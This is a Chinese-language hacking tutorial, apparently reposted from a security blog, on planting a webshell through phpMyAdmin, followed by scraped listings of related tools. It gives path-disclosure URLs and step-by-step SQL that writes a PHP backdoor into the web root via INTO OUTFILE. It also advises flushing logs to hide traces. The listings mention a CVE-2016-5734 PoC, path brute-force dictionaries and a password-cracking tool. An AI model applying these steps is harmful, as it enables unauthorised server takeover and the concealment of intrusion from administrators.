1:phpmyadmin 后台拿webshell
phpmyadmin爆路径方法 weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php
http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径
D:\usr\www\html\phpMyAdmin\
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('');
select cmd from a into outfile 'D:/usr/www/html/phpMyAdmin/d.php';
Drop TABLE IF EXISTS a;
Fatal error: Call to a member function getImgPath() on a non-object in D:\www\phpMyAdmin\themes\darkblue_orange\layout.inc.php on line 67
这里随便选择一个 数据库 我们这用MYSQL 然后点SQL 执行SQL语句
Create TABLE a (cmd text NOT NULL); 这句是 在MYSQL这个数据库中建一个 a 的表段
看到了吧 a 已经有了 然后再执行
Insert INTO a (cmd) VALUES('');
意思你应该懂了吧 就是 把PHP一句话 写到a这个表里
继续
select cmd from a into outfile 'D:/www/d.php';
这一句 就是说 把刚刚的那个 a 的表 输出到 网站的目录下的哪个文件里 我们这里把 刚暴出来的
路径写上 这里一定要注意 Windows里面的 / 这个斜刚 一定要注意 要把\ 这个斜刚换成/这个斜刚 不然PHP 不支持 就不会成功了
http://www.crystalnet.com.cn/d.php ok了 连接我们的 PHP一句话
首先:
create database joyuan; /* 建立数据库joyuan */
use joyuan; /* 连接joyuan数据库 */
create table shell(code text); /* 建立表shell字段code文本型数据text */
然后:
insert into shell(code) /* 插入数据到shell表中的code字段 */
values ('shell代码'); /* 值为shell代码 我用PHP一句话,看后面*/
select * into outfile '/home/www/htdocs/server.php' from shell;
/* 将shell表中的内容输出保存为文件(输出到web目录下,要不就无法访问shell了,可以直接输出到phpmyadmin目录下,不知道就phpinfo) */
flush logs /* 删除日志 */
删掉刚建的joyuan数据库,直接删除或执行SQL命令:drop database joyuan;
利用PHP一句话客户端(http://linux.chaom.net/Shell.Htm)写自己的shell
PHP一句话的服务端地址就是:http://xxx/phpmyadmin/server.php
搞定,嘿嘿。
PHP一句话服务端代码:
========================================
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('');
select cmd from a into outfile 'D:/phpMyAdmin/libraries/d.php';
Drop TABLE IF EXISTS a;
========================================
①建立数据库
create database hakz /*建立数据库hakz*/
use hakz /*连接hakz数据库*/
create table shell(code text) /*建立表shell,字段code为文本型数据*/ ②插入导出shell
insert into shell(code) values ('后门代码'); /*插入shell代码*/
select * into outfile '/home/www/website/…路径/shell.php' from shell;
/*导出shell到web路径下*/
flush logs /*删除日志 这一点很重要哦*/ ③删除临时数据库
drop database hakz /*或者直接在phpmyadmin中进行可视化操作*/
最后附上几种PHP一句话服务端代码:
/*容错代码*/
/*assert 函数和 eval一样*/
_______________________________________
本篇文章来源于Vip_威寶] | 关注网络信息安全 [http://www.weibao.tk/]
详细地址为:http://www.weibao.tk/article.asp?id=223
分享到:
相关推荐
利用phpMyAdmin拿webshell 利用phpMyAdmin拿webshell
【PHPMyAdmin上传Webshell详解】 在网络安全领域,Webshell是一种后门程序,通常由攻击者上传到服务器,以便远程控制被黑站点。PHPMyAdmin是广泛使用的MySQL数据库管理工具,有时会被黑客利用来上传Webshell。以下...
phpMyAdmin后台getshell复现
Phpmyadmin后台代码执行CVE-2016-5734_poc CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin...
phpmyadmin后台,后台管理路径爆破,以及,php常用路径爆破字典
/intraAdmin/phpmyadmin/db_create.php /phpmyadmin/db_create.php /intraAdmin/admin.php /do/reg.php /tag.php /wp-admin/install.php /wp-admin/admin-ajax.php /Html/fckeditor/fckeditor.php /admin/admin.php ...
单文件phpmyadmin,功能强大不比phpmyadmin差,可导出导入。可执行sql语句。
**phpMyAdmin 5.2.1 多语言版详解** phpMyAdmin 是一个非常流行的开源Web应用程序,专为MySQL数据库管理系统提供用户友好的界面,使得数据库管理变得简单易行,即使对于没有深入数据库知识的用户也是如此。在版本...
了解配置文件的内容和作用可以帮助我们更好地使用 phpMyAdmin。 phpMyAdmin 配置文件概述 phpMyAdmin 配置文件 config.inc.php 由多个部分组成,每个部分都有其特定的作用。下面我们将对每个部分进行详细的解释。 ...
phpMyAdmin多线程批量破解工具是一款用于数据库密码强制破解的工具,了解它的朋友想必不用做过多的介绍就应该了解他他是做什么的。 之前朋友问我有木有phpMyAdmin批量破解工具, 我在网上搜索了一下并没有发现相关的...
**phpMyAdmin** phpMyAdmin 是一个开源的、基于Web的MySQL数据库管理工具,它允许用户通过浏览器界面轻松地执行各种数据库操作,如创建、修改和删除数据库表,执行SQL查询,管理用户权限等。这款工具是用PHP编程...
《PHPMyAdmin 2.5.3:数据库管理的强大工具》 PHPMyAdmin,作为一款开源、免费且功能丰富的MySQL数据库管理工具,以其强大的在线数据库管理和维护能力深受开发者喜爱。标题中的“phpmyadmin2.5.3.rar”指的是这个...
phpMyAdmin - Readme =================== Version 4.3.3 A set of PHP-scripts to manage MySQL over the web. http://www.phpmyadmin.net/ Summary ------- phpMyAdmin is intended to handle the ...
**phpMyAdmin:MySQL数据库管理的强大工具** phpMyAdmin 是一款非常流行的开源Web应用程序,用于管理和维护MySQL数据库。它提供了一个直观的用户界面,使得非技术背景的用户也能轻松执行常见的数据库操作,如创建、...
phpmyadmin是大家很常用的用来管理mysql数据库的软件。它虽然已经提供了对中文的支持,但是,仅限于字段编码为:utf-8(utf8)、gbk、gb2312。对其它的编码,使用phpmyadmin进行查看时会显示为乱码。 虽然对于新的...
**phpMyAdmin中文版详解** phpMyAdmin是一款广泛使用的基于Web的MySQL数据库管理工具,它提供了用户友好的界面,使得数据库的创建、管理和维护变得轻松易行。此版本被标记为"phpMyAdmin最新中文版",意味着它包含了...
phpmyadmin数据库管理工具(图解)phpmyadmin数据库管理工具(图解)phpmyadmin数据库管理工具(图解)phpmyadmin数据库管理工具(图解)phpmyadmin数据库管理工具(图解)
phpmyadmin是大家很常用的用来管理mysql数据库的软件。它虽然已经提供了对中文的支持,但是,仅限于字段编码为:utf-8(utf8)、gbk、gb2312。对其它的编码,使用phpmyadmin进行查看时会显示为乱码。 虽然对于新的...
phpMyAdmin 管理用户手册 本手册旨在为用户提供详细的 phpMyAdmin 管理指导,涵盖了 phpMyAdmin 的基本概念、安装、配置、权限设置、数据库操作、数据导入和导出等方面的知识点。 phpMyAdmin 简介 phpMyAdmin 是...